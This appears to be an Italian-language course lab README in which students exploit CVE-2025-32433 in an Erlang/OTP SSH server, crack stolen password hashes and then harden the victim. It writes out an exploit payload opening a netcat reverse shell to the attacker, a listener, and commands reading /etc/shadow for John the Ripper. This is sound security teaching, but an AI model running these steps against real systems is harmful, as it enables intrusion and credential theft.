
Questo progetto simula uno scenario reale di attacco e difesa su due macchine virtuali. Sfrutterai una vulnerabilità critica di RCE pre-autenticazione (CVE-2025-32433) in un server SSH Erlang/OTP, craccherai gli hash delle password estratti e poi rafforzerai la macchina vittima con regole firewall e applicazione di patch.
Punti Totali: 20 | Scadenza: Non sono accettate consegne in ritardo
Questo progetto simula uno scenario reale di attacco e difesa su due macchine virtuali. Sfrutterete una vulnerabilità critica di RCE pre-autenticazione (CVE-2025-32433) in un server SSH Erlang/OTP, decifrerete gli hash delle password estratti e quindi indurirete la macchina vittima con regole firewall e patch.
| Ruolo | OS |
|---|---|
| Attaccante | Kali Linux |
| Vittima | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| File | Descrizione |
|---|---|
Debian-1.ova | Immagine VM vittima preconfigurata — scaricare separatamente, vedere Risorse (troppo grande per GitHub) |
Debian-1.ova): Link di download — troppo grande (~3GB) per essere ospitata su GitHub. Scaricarla separatamente e importarla in VirtualBox/VMware come descritto di seguito.rockyou_txt.txt): inclusa in questo repository, utilizzata per la fase di cracking delle password nella Parte 2.Debian-1.ova e la vostra VM Kali Linux in VirtualBox/VMware.ifconfig per trovare il suo IP (tipicamente in 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
Documentare le porte aperte, le versioni dei servizi e le firme Erlang.
Passare temporaneamente Kali a NAT per clonare il repository, poi tornare a Host-Only.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Modificare lo script — impostare HOST = "<victim-IP>" e aggiornare il payload:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminale 1 (Kali) — avviare il listener:
nc -lvnp 4444
Terminale 2 (Kali) — lanciare l'exploit:
python3 CVE-2025-32433.py
Nella reverse shell, eseguire whoami e hostname per confermare l'accesso.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
Documentare il formato dell'hash (ad es., $6$ = SHA-512), il tempo impiegato e la password in chiaro recuperata.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Rieseguire la scansione Nmap e l'exploit da Kali — documentare che la porta 2222 ora è "Filtered" e che l'exploit fallisce.
Documentare i passaggi per aggiornare Erlang/OTP alla versione v27.3.3 o successiva, che contiene la correzione per CVE-2025-32433.
whoami/hostname), cattura della flagCVE-2025-32433 — Esecuzione remota di codice critica pre-autenticazione nel server SSH Erlang/OTP. Sfruttabile inviando pacchetti SSH malformati prima di qualsiasi scambio di credenziali, consentendo a un attaccante non autenticato l'accesso completo alla shell.
Project Spring 2026 - Google Docs.pdf | Istruzioni complete del progetto con le consegne |
rockyou_txt.txt | Wordlist utilizzata con John the Ripper per decifrare l'hash della password estratto |